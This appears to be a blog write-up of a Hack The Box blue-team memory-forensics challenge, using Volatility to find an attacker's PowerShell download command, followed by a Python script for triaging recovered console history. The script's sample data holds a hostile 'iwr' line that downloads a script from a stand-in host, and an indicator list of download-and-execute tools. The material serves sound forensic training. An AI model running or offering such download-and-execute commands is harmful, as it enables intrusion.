Hack The Box: Export

Nate
3 min read · May 19, 2023


Challenge 3 of the Intro to Blue Team Track

Description:

We spotted a suspicious connection to one of our servers, and immediately took a memory dump. Can you figure out what the attackers were up to?

Here we go!

Like always with these, download the files. This time it appears to be a .raw file.

For this analysis we are going to use Volatility.
You can download it from here -> https://www.volatilityfoundation.org/releases (or it can also be installed from GitHub).

To make things simple, I’ve renamed the standalone executable to “vol.exe” and the memory dump to “dump.raw”.

Here is the basic syntax: .\vol.exe -f <filename> --profile=<profile> <command> (or vol.py, depending on how you installed it).

The only information we’re missing here is the profile. Don’t fret! Volatility’s imageinfo plugin can scan the dump and suggest the best profile to use.

Run this command:

.\vol.exe imageinfo -f <path to memory dump>

The suggested profile for this dump is Win7SP1x64.

First, we should check what processes were running when the memory was dumped.

One of the commands that will allow us to do this is the “pslist” command.

.\vol.exe -f <path to memory dump> --profile=Win7SP1x64 pslist

You should see something like this:

You can also output this to a text file by simply adding > output.txt to the end of the last command. (I advise exporting everything you can so you don’t have to rerun commands if you need to go back).

If you would like to see the process tree instead, just replace “pslist” with “pstree” in the command.

Since cmd.exe was running, let’s see if anything suspicious is still hanging around in memory from that process. For this, we simply use the cmdscan plugin, which recovers console command history:

.\vol.exe -f <path to memory dump> --profile=Win7SP1x64 cmdscan > cmdscan-output.txt

We can see a suspicious iwr (Invoke-WebRequest) command that was used to download a PowerShell script from a shortened URL.

Let’s use CyberChef to URL-decode this back to a readable URL:

Looks like there is some base64 in the URL as well.

Let’s convert that:

Oh…well…I guess that’s where this challenge ends…there’s the flag!
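If you want to skip the CyberChef round trips next time, the two steps above (spotting the iwr download in the cmdscan output, then URL-decoding and base64-decoding what it carries) can be scripted. The following is an added example, not part of the original write-up or of Volatility itself: it parses text in the layout cmdscan prints (“Cmd #N @ 0x…: command”), flags download-and-execute indicators, and decodes any base64 smuggled in a URL’s query string. The sample history, host name and payload are constructed for this example and are not the challenge data.

```python
import base64
import binascii
import re
from urllib.parse import unquote, urlparse

# Constructed sample in the layout Volatility 2's cmdscan plugin prints.
# The commands, host and base64 payload are made up for this example.
SAMPLE_CMDSCAN = """\
**************************************************
CommandProcess: conhost.exe Pid: 2884
CommandHistory: 0x1fe9c0 Application: cmd.exe Flags: Allocated, Reset
CommandCount: 3 LastAdded: 2 LastDisplayed: 2
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x5c
Cmd #0 @ 0x1e1f70: ipconfig /all
Cmd #1 @ 0x1fa3c0: whoami
Cmd #2 @ 0x1fb890: powershell -c "iwr http://short.example/abc?q=SFRCe2NvbnN0cnVjdGVkX3BsYWNlaG9sZGVyfQ%3D%3D -OutFile s.ps1"
"""

CMD_LINE = re.compile(r"^Cmd #\d+ @ 0x[0-9a-fA-F]+: (.*)$", re.MULTILINE)
URL_RE = re.compile(r"https?://[^\s\"'<>]+")

# Download-and-execute indicators worth flagging in recovered console history.
INDICATORS = {
    "iwr": "Invoke-WebRequest alias",
    "invoke-webrequest": "Invoke-WebRequest",
    "downloadstring": "Net.WebClient DownloadString",
    "frombase64string": "inline base64 decode",
    "-enc": "encoded PowerShell command",
}


def extract_commands(cmdscan_text):
    """Return the command strings recovered from cmdscan output, in history order."""
    return CMD_LINE.findall(cmdscan_text)


def flag_suspicious(command):
    """Return the indicator labels matched by one command line (empty if clean)."""
    lower = command.lower()
    return [label for token, label in INDICATORS.items() if token in lower]


def decode_b64_param(value):
    """Decode one value as base64 text, or return None if it is not base64/text."""
    padded = value + "=" * (-len(value) % 4)  # tolerate padding stripped for URLs
    try:
        raw = base64.b64decode(padded, validate=True)
    except (binascii.Error, ValueError):
        return None
    for codec in ("utf-8", "utf-16-le"):  # -enc payloads are UTF-16LE
        try:
            text = raw.decode(codec)
        except UnicodeDecodeError:
            continue
        if text.isprintable():
            return text
    return None


def decode_url_params(url):
    """Percent-decode the URL's query string and decode every base64 parameter."""
    decoded = {}
    for pair in urlparse(url).query.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        # unquote() rather than parse_qs(): parse_qs turns '+' into a space,
        # which silently corrupts base64 that happens to contain '+'.
        text = decode_b64_param(unquote(value))
        if text is not None:
            decoded[unquote(key)] = text
    return decoded


def triage(cmdscan_text):
    """Flag suspicious commands and decode base64 carried in their URLs."""
    findings = []
    for command in extract_commands(cmdscan_text):
        hits = flag_suspicious(command)
        if not hits:
            continue
        finding = {"command": command, "indicators": hits, "urls": {}}
        for url in URL_RE.findall(command):
            finding["urls"][url] = decode_url_params(url)
        findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_CMDSCAN):
        print(f["command"])
        print("  indicators:", ", ".join(f["indicators"]))
        for url, params in f["urls"].items():
            print("  url:", url)
            for key, text in params.items():
                print(f"    {key} -> {text}")
```

Point it at your exported cmdscan-output.txt by passing the file’s contents to triage(); the indicator list is a starting point, so extend it with whatever your environment considers abnormal (certutil, bitsadmin, and so on).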

On to the next.
